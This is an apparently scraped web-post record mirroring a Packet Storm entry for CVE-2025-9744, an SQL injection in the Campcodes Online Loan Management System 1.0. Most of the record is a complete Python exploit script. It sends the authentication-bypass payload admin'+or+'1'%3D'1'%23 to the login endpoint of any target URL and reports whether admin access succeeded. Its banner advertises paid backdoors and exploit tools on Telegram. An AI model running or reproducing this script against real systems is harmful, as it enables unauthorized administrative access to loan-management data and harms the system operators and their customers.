{“lastseen”:”2025-10-21T17:36:26″,”description”:”Campcodes………………………………”,”published”:”2025-10-21T00:00:00″,”modified”:”2025-10-21T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Campcodes Online Loan Management System 1.0 SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:210713″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-9744″],”sourceData”:”# -*- coding: utf-8 -*-\\n # Exploit [Loan Management System] v1.0 – SQL Injection\\n # Google Dork: N\/A\\n # Date: 20\/10\/2025\\n # Exploit Author: CodeB0ss\\n # Vendor: Loan Management System\\n # Software Link: https:\/\/www.loanpro.io\/\\n # Version: \\u003c= 1.0.0\\n # Tested on: Windows\\n # CVE : CVE-2025-9744\\n # CVSS Score : 10\\n \\n from future import print_function\\n import requests\\n import sys\\n \\n banner = ”’\\n \\n -#-\\n bY t.me\/uncodeboss\\n \\n CVE-2025-9744 =\\u003e [Loan Management System] v1.0 – SQL Injection\\n \\n [Notification] : Become a VP user and get all the exploits and tools,\\n backdoors\\n t.me\/realcodeb0ss . 35% Discount Prefer Code : 9QzkLw\\n \\n [Usage] :\\n python CVE-2025-9744.py -u http\/https or just example.com.\\n \\n ”’\\n \\n try:\\n requests.packages.urllib3.disable_warnings()\\n except:\\n pass\\n \\n def codeb0ssexp(codeb0ss_base):\\n if not codeb0ss_base.startswith(\\”http:\/\/\\”) and not\\n codeb0ss_base.startswith(\\”https:\/\/\\”):\\n codeb0ss_base = \\”http:\/\/\\” + codeb0ss_base\\n base_url = codeb0ss_base.rstrip(\\”\/\\”)\\n \\n cdb0s = requests.Session()\\n cdb0s.headers.update({\\n ‘User-Agent’: ‘Mozilla\/5.0 (https:\/\/t.me\/realcodeb0ss) Gecko\/20100101\\n Firefox\/113.0’,\\n ‘Content-Type’: ‘application\/x-www-form-urlencoded’\\n })\\n red = \\”\\\\033[91m\\”\\n green = \\”\\\\033[92m\\”\\n post_path = \\”\/ajax.php?action=login\\”\\n get_path = \\”\/index.php?page=home\\”\\n post_url = base_url + post_path\\n get_url = base_url + get_path\\n username = \\”admin’+or+’1’%3D’1’%23\\”\\n password = \\”expbycodeb0ss\\”\\n payload = \\”username={}\\u0026password={}\\”.format(username, password)\\n \\n try:\\n r_post = cdb0s.post(post_url, data=payload, timeout=10, verify=False)\\n r_get = cdb0s.get(get_url, timeout=10, verify=False)\\n try:\\n combined = (r_post.text or \\”\\”) + (r_get.text or \\”\\”)\\n except Exception:\\n combined = (r_post.content or \\”\\”) + (r_get.content or \\”\\”)\\n group1 = [\\”window.start_load\\”, \\”Welcome back Admin\\”, \\”Loan Management\\n System\\”]\\n group1_ok = all(w in combined for w in group1)\\n group2_ok = (\\”login-form\\” in combined)\\n if group1_ok and group2_ok:\\n print(\\” – \\” + base_url + \\” –\\u003e \\” + green + \\”Vulnerable\\”)\\n print(\\” – {}\\”.format(post_url))\\n print(\\” – {}\\”.format(get_url))\\n return 0\\n else:\\n print(\\” – \\” + base_url + \\” –\\u003e \\” + red + \\”Not_Vulnerable\\”)\\n return 2\\n except requests.exceptions.RequestException as e:\\n print(\\” – \\” + base_url + \\” –\\u003e \\” + red + \\”Time0ut\\”)\\n return 1\\n def startexp():\\n if ‘-u’ in sys.argv:\\n idx = sys.argv.index(‘-u’)\\n if idx + 1 \\u003c len(sys.argv):\\n return sys.argv[idx + 1]\\n return None\\n def main():\\n print(banner)\\n target = startexp()\\n if not target:\\n sys.exit(1)\\n \\n rc = codeb0ssexp(target)\\n sys.exit(rc)\\n if name == \\”main\\”:\\n main()”,”sourceHref”:”https:\/\/packetstorm.news\/download\/210713″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:”3.0″,”vectorString”:”CVSS:3.0\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:L\/I:L\/A:L\/E:P\/RC:R”,”baseScore”:7.3,”baseSeverity”:”HIGH”,”attackVector”:”NETWORK”,”attackComplexity”:”LOW”,”privilegesRequired”:”NONE”,”userInteraction”:”NONE”,”scope”:”UNCHANGED”,”confidentialityImpact”:”LOW”,”integrityImpact”:”LOW”,”availabilityImpact”:”LOW”}},”href”:”https:\/\/packetstorm.news\/files\/id\/210713\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-10-21T17:36:26″,”description”:”Campcodes………………………………”,”published”:”2025-10-21T00:00:00″,”modified”:”2025-10-21T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Campcodes Online Loan Management System 1.0 SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:210713″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-9744″],”sourceData”:”# -*- coding: utf-8 -*-\\n # Exploit [Loan Management System] v1.0 – SQL Injection\\n # Google Dork:…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-22511","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n